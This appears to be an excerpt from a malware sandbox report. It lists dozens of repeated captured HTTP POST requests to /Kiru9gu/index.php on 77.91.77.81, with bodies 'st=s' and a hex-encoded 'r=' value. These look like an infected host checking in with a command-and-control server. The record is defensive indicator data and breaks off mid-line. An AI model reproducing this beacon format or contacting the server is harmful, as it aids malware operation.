                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: 